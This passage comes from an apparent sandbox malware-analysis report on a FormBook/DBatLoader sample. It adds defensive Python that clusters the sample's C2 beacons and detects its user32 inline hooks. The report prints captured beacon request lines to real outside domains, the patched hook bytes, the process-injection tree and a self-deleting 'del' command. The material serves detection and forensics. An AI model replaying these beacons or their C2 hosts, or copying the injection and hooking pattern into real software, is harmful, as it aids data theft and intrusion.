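     "GET /ao65/?3f94p=1+k7ryNQzoPRnNssVcxEVGqYVXcpdNYnwR6YaRuf8QIEqfcPbXX6k2BVupn8sj0YeeXTfXT4xQ==&ojq4i=mFNh5n78I22D3DgP HTTP/1.1"),
    (4004, r"C:\Windows\explorer.exe", "www.harmonicod.com",
     "GET /ao65/?3f94p=SIOjWgUx9Sz9T19JihLVHEMNoaK2maww+N41rkYkWun2OwaoSexibxzMqiX45PItRVwWmDJ2nA==&ojq4i=mFNh5n78I22D3DgP HTTP/1.1"),
    (4004, r"C:\Windows\explorer.exe", "www.kermisbedrijfkramer.online",
     "GET /ao65/?3f94p=Y9yn8u0REY9c1IpGc1acQeiywl67Bz4kR9nr06rl/WLBU1XMoiFOUgbvS2/Y+YwQBdR3MSzENA==&ojq4i=mFNh5n78I22D3DgP HTTP/1.1"),
    (4004, r"C:\Windows\explorer.exe", "www.stellarskyline.com",
     "GET /ao65/?3f94p=VAHOj8ipz1NvM3cWmHPyRmFT7dV4XaBrhkZucwTvHTdt+uk8nfyPBl3lilEqIH7Lfnspwggtew==&ojq4i=mFNh5n78I22D3DgP HTTP/1.1"),
    (4004, r"C:\Windows\explorer.exe", "www.hivaom.top",
     "GET /ao65/?3f94p=B3GcozZs3ohtof+Eq3ZwUrCdoNWOjNCPbyllHAjlOtmwH5sozkgIB7xqH4//btWoobo3GMsY9g==&ojq4i=mFNh5n78I22D3DgP HTTP/1.1"),
    # Constructed benign control record, not from the report.
    (1234, r"C:\Program Files\Example\updater.exe", "updates.example.com",
     "GET /check?version=1.2.3&channel=stable HTTP/1.1"),
]


def parse_request_line(line):
    """Split 'METHOD target HTTP/1.x' into (method, path, [(name, value), ...]).

    The query is split by hand rather than with parse_qsl so that '+' and the
    trailing '=' padding in the values survive untouched."""
    m = REQUEST_LINE.match(line)
    if not m:
        raise ValueError(f"not an HTTP/1.x request line: {line!r}")
    target = urlsplit(m.group("target"))
    params = []
    for pair in target.query.split("&") if target.query else []:
        name, _, value = pair.partition("=")
        params.append((name, value))
    return m.group("method"), target.path, params


def find_beacon_clusters(records, min_hosts=3):
    """Group requests by (pid, process, method, path, parameter names) and
    return the groups that look like one beacon walking a host list."""
    clusters = defaultdict(list)
    for pid, process, host, line in records:
        method, path, params = parse_request_line(line)
        key = (pid, process, method, path, tuple(sorted(n for n, _ in params)))
        clusters[key].append((host, dict(params)))

    hits = []
    for (pid, process, method, path, names), reqs in clusters.items():
        hosts = sorted({h for h, _ in reqs})
        if not names or len(hosts) < min_hosts:
            continue
        # every value of every parameter must look like base64
        if not all(BASE64ISH.match(p[n]) for _, p in reqs for n in names):
            continue
        # at least one parameter keeps the same value across all hosts
        constant = {n: reqs[0][1][n] for n in names if len({p[n] for _, p in reqs}) == 1}
        if not constant:
            continue
        hits.append({"pid": pid, "process": process, "method": method, "path": path,
                     "param_names": names, "constant_params": constant, "hosts": hosts})
    return hits


if __name__ == "__main__":
    for hit in find_beacon_clusters(SAMPLE_REQUESTS):
        print(f"PID {hit['pid']} ({hit['process']}) {hit['method']} {hit['path']} "
              f"params={hit['param_names']} constant={hit['constant_params']}")
        for host in hit["hosts"]:
            print("   ", host)
```

On the report's requests this yields one cluster (PID 4004, /ao65/, parameters 3f94p and ojq4i, six hosts) and nothing for the control record. Treat the whole host list as one indicator set rather than blocking only the host that answered 200: the capture shows the client does not stop after a redirect or a 403. Two further traits visible in the sessions, the seven trailing null bytes after each request (Data Raw: 00 00 00 00 00 00 00) and Connection: close on every request, are left to a wire-level signature; the clustering above is what survives host rotation in proxy or EDR logs that only keep the request line and Host header.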


                                                                                                  Code Manipulations

                                                                                                   Function Name | Hook Type | Active in Processes
                                                                                                   PeekMessageA | INLINE | explorer.exe
                                                                                                   PeekMessageW | INLINE | explorer.exe
                                                                                                   GetMessageW | INLINE | explorer.exe
                                                                                                   GetMessageA | INLINE | explorer.exe
                                                                                                   Function Name | Hook Type | New Data
                                                                                                   PeekMessageA | INLINE | 0x48 0x8B 0xB8 0x8D 0xDE 0xEE
                                                                                                   PeekMessageW | INLINE | 0x48 0x8B 0xB8 0x85 0x5E 0xEE
                                                                                                   GetMessageW | INLINE | 0x48 0x8B 0xB8 0x85 0x5E 0xEE
                                                                                                   GetMessageA | INLINE | 0x48 0x8B 0xB8 0x8D 0xDE 0xEE
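
The table lists four user32 message-loop exports whose prologues were rewritten inside explorer.exe. Note that the "New Data" bytes do not begin with any of the usual trampoline encodings (E9 jmp rel32, FF 25 jmp [mem], push/ret, mov rax/jmp rax), so a detector that only pattern-matches for jump stubs would miss this hook; comparing the live prologue against a reference copy does not. The script below is an added example, not Joe Sandbox code and not part of the report. Its classifier and byte-diff are plain Python; the memory reader is Windows-only and assumes a 64-bit Python inspecting a 64-bit explorer.exe with PROCESS_VM_READ rights, so that user32.dll sits at the same base in both processes and a local GetProcAddress result is valid in the target. The reference copy it uses is this process's own mapping of user32.dll, which is itself an assumption (see the note after the block).

```python
"""Check the user32 exports the report lists as INLINE-hooked for a patched prologue.

Added example, not from the report. classify_prologue() and diff_offsets() run
anywhere; read_remote_prologues() needs Windows (assumption: 64-bit Python and a
64-bit target, so user32.dll shares its base address with this process).
"""
import sys
import ctypes

# Function names and "New Data" bytes copied from the Code Manipulations table above.
HOOKED_EXPORTS = {
    "PeekMessageA": bytes.fromhex("48 8B B8 8D DE EE"),
    "PeekMessageW": bytes.fromhex("48 8B B8 85 5E EE"),
    "GetMessageW":  bytes.fromhex("48 8B B8 85 5E EE"),
    "GetMessageA":  bytes.fromhex("48 8B B8 8D DE EE"),
}


def classify_prologue(data: bytes) -> str:
    """Name the control-transfer stub at the start of a function if it is one of
    the common inline-hook trampolines; otherwise report that none was recognised."""
    if len(data) >= 5 and data[0] == 0xE9:
        return "jmp rel32"
    if len(data) >= 2 and data[0] == 0xEB:
        return "jmp rel8"
    if len(data) >= 6 and data[:2] == b"\xFF\x25":
        return "jmp [mem]"                      # rip-relative on x64, absolute on x86
    if len(data) >= 6 and data[0] == 0x68 and data[5] == 0xC3:
        return "push imm32; ret"
    if len(data) >= 12 and data[:2] == b"\x48\xB8" and data[10:12] == b"\xFF\xE0":
        return "mov rax, imm64; jmp rax"
    return "no known stub"


def diff_offsets(baseline: bytes, observed: bytes) -> list:
    """Offsets at which the observed prologue differs from the baseline copy."""
    n = min(len(baseline), len(observed))
    return [i for i in range(n) if baseline[i] != observed[i]]


def read_remote_prologues(pid: int, names=tuple(HOOKED_EXPORTS), nbytes: int = 16) -> dict:
    """Return {export: (local_bytes, remote_bytes)} for the user32 exports in `pid`."""
    if sys.platform != "win32":
        raise OSError("read_remote_prologues() needs Windows")
    k32 = ctypes.windll.kernel32
    k32.OpenProcess.restype = ctypes.c_void_p
    k32.OpenProcess.argtypes = [ctypes.c_uint32, ctypes.c_int, ctypes.c_uint32]
    k32.GetProcAddress.restype = ctypes.c_void_p
    k32.GetProcAddress.argtypes = [ctypes.c_void_p, ctypes.c_char_p]
    k32.ReadProcessMemory.argtypes = [ctypes.c_void_p, ctypes.c_void_p, ctypes.c_void_p,
                                      ctypes.c_size_t, ctypes.POINTER(ctypes.c_size_t)]
    k32.CloseHandle.argtypes = [ctypes.c_void_p]
    PROCESS_QUERY_INFORMATION, PROCESS_VM_READ = 0x0400, 0x0010
    handle = k32.OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, 0, pid)
    if not handle:
        raise ctypes.WinError()
    base = ctypes.WinDLL("user32")._handle      # loads user32 here; same base in the target
    result = {}
    try:
        for name in names:
            addr = k32.GetProcAddress(base, name.encode("ascii"))
            if not addr:
                raise ctypes.WinError()
            buf = ctypes.create_string_buffer(nbytes)
            got = ctypes.c_size_t(0)
            if not k32.ReadProcessMemory(handle, addr, buf, nbytes, ctypes.byref(got)):
                raise ctypes.WinError()
            result[name] = (ctypes.string_at(addr, nbytes), buf.raw[:got.value])
    finally:
        k32.CloseHandle(handle)
    return result


def report(pid: int) -> list:
    """One (export, stub class, changed offsets, hex) per prologue that differs."""
    findings = []
    for name, (local, remote) in read_remote_prologues(pid).items():
        changed = diff_offsets(local, remote)
        if changed:
            findings.append((name, classify_prologue(remote), changed, remote.hex(" ")))
    return findings


if __name__ == "__main__":
    if len(sys.argv) == 2:
        for finding in report(int(sys.argv[1])):
            print(*finding)
    else:
        # Offline: classify the bytes the sandbox reported.
        for name, data in HOOKED_EXPORTS.items():
            print(f"{name:13} {data.hex(' ')}  -> {classify_prologue(data)}")
```

Run with the explorer.exe PID as the only argument on a suspect host, or with no argument to classify the report's bytes offline (all four come back as "no known stub"). The baseline is the inspecting process's own user32 mapping, which is fine when that process was started after the suspect activity and is itself clean; FormBook is reported here to inject into a system process, so for a forensic-grade comparison take the reference bytes from the on-disk user32.dll of the same build instead, which this example does not do.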


                                                                                                   Target ID: 0
                                                                                                   Start time: 14:56:03
                                                                                                   Start date: 30/11/2023
                                                                                                   Path: C:\Users\user\Desktop\Fpopgapwdcgvxn.exe
                                                                                                   Wow64 process (32bit): true
                                                                                                   Commandline: C:\Users\user\Desktop\Fpopgapwdcgvxn.exe
                                                                                                   Imagebase: 0x400000
                                                                                                   File size: 2'403'840 bytes
                                                                                                   MD5 hash: 072D323C28E7BA4D63EB7DF9894F33C9
                                                                                                   Has elevated privileges: true
                                                                                                   Has administrator privileges: true
                                                                                                   Programmed in: Borland Delphi
                                                                                                   Yara matches:
                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.2333009592.0000000014D50000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.2333009592.0000000014D50000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.2333009592.0000000014D50000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.2333009592.0000000014D50000.00000040.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.2333009592.0000000014D50000.00000040.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.2332347871.0000000014B9A000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.2332347871.0000000014B9A000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.2332347871.0000000014B9A000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.2332347871.0000000014B9A000.00000004.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.2332347871.0000000014B9A000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000003.2317053804.000000007EBB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000003.2317053804.000000007EBB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000003.2317053804.000000007EBB0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000003.2317053804.000000007EBB0000.00000004.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000003.2317053804.000000007EBB0000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                  Reputation:low
                                                                                                  Has exited:true

                                                                                                  Target ID:3
                                                                                                  Start time:14:56:19
                                                                                                  Start date:30/11/2023
                                                                                                  Path:C:\Windows\SysWOW64\colorcpl.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:C:\Windows\System32\colorcpl.exe
                                                                                                  Imagebase:0x1d0000
                                                                                                  File size:86'528 bytes
                                                                                                  MD5 hash:DB71E132EBF1FEB6E93E8A2A0F0C903D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.2387834740.0000000005280000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2387834740.0000000005280000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.2387834740.0000000005280000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.2387834740.0000000005280000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.2387834740.0000000005280000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.2387807340.0000000005250000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2387807340.0000000005250000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.2387807340.0000000005250000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.2387807340.0000000005250000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.2387807340.0000000005250000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.2388135598.00000000068B0000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2388135598.00000000068B0000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.2388135598.00000000068B0000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.2388135598.00000000068B0000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.2388135598.00000000068B0000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                  Reputation:moderate
                                                                                                  Has exited:true

                                                                                                  Target ID:5
                                                                                                  Start time:14:56:21
                                                                                                  Start date:30/11/2023
                                                                                                  Path:C:\Windows\explorer.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\Explorer.EXE
                                                                                                  Imagebase:0x7ff609140000
                                                                                                  File size:5'141'208 bytes
                                                                                                  MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:false

                                                                                                  Target ID:6
                                                                                                  Start time:14:56:24
                                                                                                  Start date:30/11/2023
                                                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:C:\Windows\SysWOW64\rundll32.exe
                                                                                                  Imagebase:0xc00000
                                                                                                  File size:61'440 bytes
                                                                                                  MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.4615095340.0000000000BA0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4615095340.0000000000BA0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4615095340.0000000000BA0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.4615095340.0000000000BA0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.4615095340.0000000000BA0000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.4608973113.0000000000710000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4608973113.0000000000710000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4608973113.0000000000710000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.4608973113.0000000000710000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.4608973113.0000000000710000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.4614921342.0000000000B60000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4614921342.0000000000B60000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4614921342.0000000000B60000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.4614921342.0000000000B60000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.4614921342.0000000000B60000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                  Reputation:high
                                                                                                  Has exited:false

                                                                                                  Target ID:7
                                                                                                  Start time:14:56:27
                                                                                                  Start date:30/11/2023
                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:/c del "C:\Windows\SysWOW64\colorcpl.exe"
                                                                                                  Imagebase:0x1c0000
                                                                                                  File size:236'544 bytes
                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  Target ID:8
                                                                                                  Start time:14:56:27
                                                                                                  Start date:30/11/2023
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff66e660000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  Target ID:9
                                                                                                  Start time:14:56:28
                                                                                                  Start date:30/11/2023
                                                                                                  Path:C:\Users\Public\Libraries\Telragab.PIF
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Users\Public\Libraries\Telragab.PIF"
                                                                                                  Imagebase:0x400000
                                                                                                  File size:2'403'840 bytes
                                                                                                  MD5 hash:072D323C28E7BA4D63EB7DF9894F33C9
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:Borland Delphi
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: C:\Users\Public\Libraries\Telragab.PIF, Author: Joe Security
                                                                                                  Antivirus matches:
                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                  • Detection: 70%, ReversingLabs
                                                                                                  Reputation:low
                                                                                                  Has exited:true

                                                                                                  Target ID:11
                                                                                                  Start time:14:56:38
                                                                                                  Start date:30/11/2023
                                                                                                  Path:C:\Users\Public\Libraries\Telragab.PIF
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Users\Public\Libraries\Telragab.PIF"
                                                                                                  Imagebase:0x400000
                                                                                                  File size:2'403'840 bytes
                                                                                                  MD5 hash:072D323C28E7BA4D63EB7DF9894F33C9
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:Borland Delphi
                                                                                                  Reputation:low
                                                                                                  Has exited:true

                                                                                                  Target ID:12
                                                                                                  Start time:14:56:46
                                                                                                  Start date:30/11/2023
                                                                                                  Path:C:\Windows\SysWOW64\colorcpl.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:C:\Windows\System32\colorcpl.exe
                                                                                                  Imagebase:0x1d0000
                                                                                                  File size:86'528 bytes
                                                                                                  MD5 hash:DB71E132EBF1FEB6E93E8A2A0F0C903D
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.2614531899.00000000065F0000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.2614531899.00000000065F0000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.2614531899.00000000065F0000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.2614531899.00000000065F0000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.2614531899.00000000065F0000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.2614107141.00000000046D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.2614107141.00000000046D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.2614107141.00000000046D0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.2614107141.00000000046D0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.2614107141.00000000046D0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.2614057783.00000000046A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.2614057783.00000000046A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.2614057783.00000000046A0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.2614057783.00000000046A0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.2614057783.00000000046A0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                  Reputation:moderate
                                                                                                  Has exited:true

                                                                                                  Target ID:13
                                                                                                  Start time:14:56:47
                                                                                                  Start date:30/11/2023
                                                                                                  Path:C:\Windows\SysWOW64\chkdsk.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:C:\Windows\SysWOW64\chkdsk.exe
                                                                                                  Imagebase:0x590000
                                                                                                  File size:23'040 bytes
                                                                                                  MD5 hash:B4016BEE9D8F3AD3D02DD21C3CAFB922
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.2617984530.0000000004D10000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.2617984530.0000000004D10000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.2617984530.0000000004D10000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.2617984530.0000000004D10000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.2617984530.0000000004D10000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                  Reputation:moderate
                                                                                                  Has exited:true

                                                                                                  Target ID:14
                                                                                                  Start time:14:56:53
                                                                                                  Start date:30/11/2023
                                                                                                  Path:C:\Windows\SysWOW64\SndVol.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:C:\Windows\System32\SndVol.exe
                                                                                                  Imagebase:0xf90000
                                                                                                  File size:226'712 bytes
                                                                                                  MD5 hash:BD4A1CC3429ED1251E5185A72501839B
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:moderate
                                                                                                  Has exited:false

                                                                                                  Target ID:17
                                                                                                  Start time:14:56:54
                                                                                                  Start date:30/11/2023
                                                                                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 368 -s 2180
                                                                                                  Imagebase:0x7c0000
                                                                                                  File size:483'680 bytes
                                                                                                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true


                                                                                                    Execution Graph

                                                                                                    Execution Coverage:6.9%
                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                    Signature Coverage:21.8%
                                                                                                    Total number of Nodes:565
                                                                                                    Total number of Limit Nodes:27
